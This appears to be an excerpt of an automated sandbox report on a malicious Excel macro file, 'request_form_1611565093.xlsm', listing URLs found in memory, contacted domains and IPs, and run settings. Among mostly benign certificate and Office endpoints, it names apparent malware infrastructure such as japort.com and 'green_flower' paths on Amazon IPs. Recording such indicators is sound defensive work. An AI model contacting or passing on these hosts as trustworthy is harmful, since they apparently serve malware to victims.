http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.suscerte.gob.ve/dpc0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
https://3.14.70.198/flower/green_flowerj	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0%	URL Reputation	safe
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0%	URL Reputation	safe
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	URL Reputation	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	URL Reputation	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
https://3.14.70.198/flower/green_flower~	0%	Avira URL Cloud	safe
http://ac.economia.gob.mx/last.crl0G	0%	URL Reputation	safe
http://ac.economia.gob.mx/last.crl0G	0%	URL Reputation	safe
http://ac.economia.gob.mx/last.crl0G	0%	URL Reputation	safe
http://crl.oces.trust2408.com/oces.crl0	0%	URL Reputation	safe
http://crl.oces.trust2408.com/oces.crl0	0%	URL Reputation	safe
http://crl.oces.trust2408.com/oces.crl0	0%	URL Reputation	safe
https://3.14.70.198/	0%	Avira URL Cloud	safe
http://certs.oaticerts.com/repository/OATICA2.crl	0%	URL Reputation	safe
http://certs.oaticerts.com/repository/OATICA2.crl	0%	URL Reputation	safe
http://certs.oaticerts.com/repository/OATICA2.crl	0%	URL Reputation	safe
http://certs.oati.net/repository/OATICA2.crt0	0%	URL Reputation	safe
http://certs.oati.net/repository/OATICA2.crt0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
japort.com	50.87.232.245	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certplus.com/CRL/class3.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://shell.suite.office.com:1443	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://ocsp.suscerte.gob.ve0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://autodiscover-s.outlook.com/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://crl.dhimyotis.com/certignarootca.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://cdn.entity.	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://www.chambersign.org1	fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://repository.swisssign.com/0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-c/cacrl.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://api.aadrm.com/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.suscerte.gob.ve/dpc0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.disig.sk/ca/crl/ca_disig.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://3.14.70.198/flower/green_flowerj	fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://api.microsoftstream.com/api/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://cr.office.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://pki.registradores.org/normativa/index.htm0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://policy.camerfirma.com0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officeci.azurewebsites.net/api/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	Avira URL Cloud: safe	unknown
http://www.anf.es/es/address-direccion.html	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://www.anf.es/address/)1(0&	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-b/cacrl.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/dpc/0Z	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.wellsfargo.com/wsprca.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://wwww.certigna.fr/autorites/0m	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://www.anf.es/AC/ANFServerCA.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://www.odwebp.svc.ms	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://web.microsoftstream.com/video/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://www.globaltrust.info0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://3.14.70.198/flower/green_flower~	fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ac.economia.gob.mx/last.crl0G	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://crl.oces.trust2408.com/oces.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://eca.hinet.net/repository0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://weather.service.msn.com/data.aspx	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://3.14.70.198/	fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500266048.000001DEEECE6000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.oaticerts.com/repository/OATICA2.crl	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://certs.oati.net/repository/OATICA2.crt0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.accv.es00	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://3.19.60.159/flower/green_flower;	fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://html4/loose.dtd	fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://web.ncdc.gov.sa/crl/nrcaparta1.crl	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.datev.de/zertifikat-policy-int0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://clients.config.office.net/user/v1.0/ios	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://192.168.0.1/x	fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://3.19.60.159/flower/green_flowerj	fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://3.19.60.159/flower/green_flowerl	fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://3.19.60.159/flower/green_flowerm32	fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://3.19.60.159/flower/green_flowern	fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://o365auditrealtimeingestion.manage.office.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://3.19.60.159/flower/green_flower	fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.office365.com/api/v1.0/me/Activities	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://www.acabogacia.org0	fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://192.168.0.1/p	fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.firmaprofesional.com/cps0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
https://clients.config.office.net/user/v1.0/android/policies	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://entitlement.diagnostics.office.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://.css	fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.securetrust.com/SGCA.crl0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://www.agesic.gub.uy/acrn/acrn.crl0)	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://%s.pinrules.crt/%sendTraceLogca1.3.6.1.4.1.311.10.8.11.3.6.1.4.1.311.10.11.1.3.6.1.4.1.311.1	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.rcsc.lt/repository0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://web.certicamara.com/marco-legal0Z	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://www.quovadisglobal.com/cps0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false		high
http://www.correo.com.uy/correocert/cps.pdf0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://devnull.onenote.com	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
https://messaging.office.com/	06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.dr	false		high
http://certs.oaticerts.com/repository/OATICA2.crt08	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://.jpg	fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://cps.chambersign.org/cps/chambersignroot.html0	fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
3.19.60.159	unknown	United States	16509	AMAZON-02US	false
3.14.70.198	unknown	United States	16509	AMAZON-02US	false
50.87.232.245	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false

Private

IP
192.168.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	343657
Start date:	25.01.2021
Start time:	10:22:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	request_form_1611565093.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.expl.evad.winXLSM@5/15@1/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 83.4%) Quality average: 51.7% Quality standard deviation: 35.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.139.144, 168.61.161.212, 52.109.32.63, 52.109.88.39, 52.109.88.37, 40.88.32.150, 92.122.144.200, 51.104.144.132, 92.122.213.194, 92.122.213.247, 93.184.221.240, 51.103.5.186, 40.126.31.137, 40.126.31.6, 40.126.31.8, 20.190.159.138, 20.190.159.132, 40.126.31.4, 40.126.31.135, 20.190.159.134, 51.11.168.160, 20.54.26.129, 92.122.145.220 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, wu.azureedge.net, www.tm.a.prd.aadg.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, emea1.notify.windows.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, 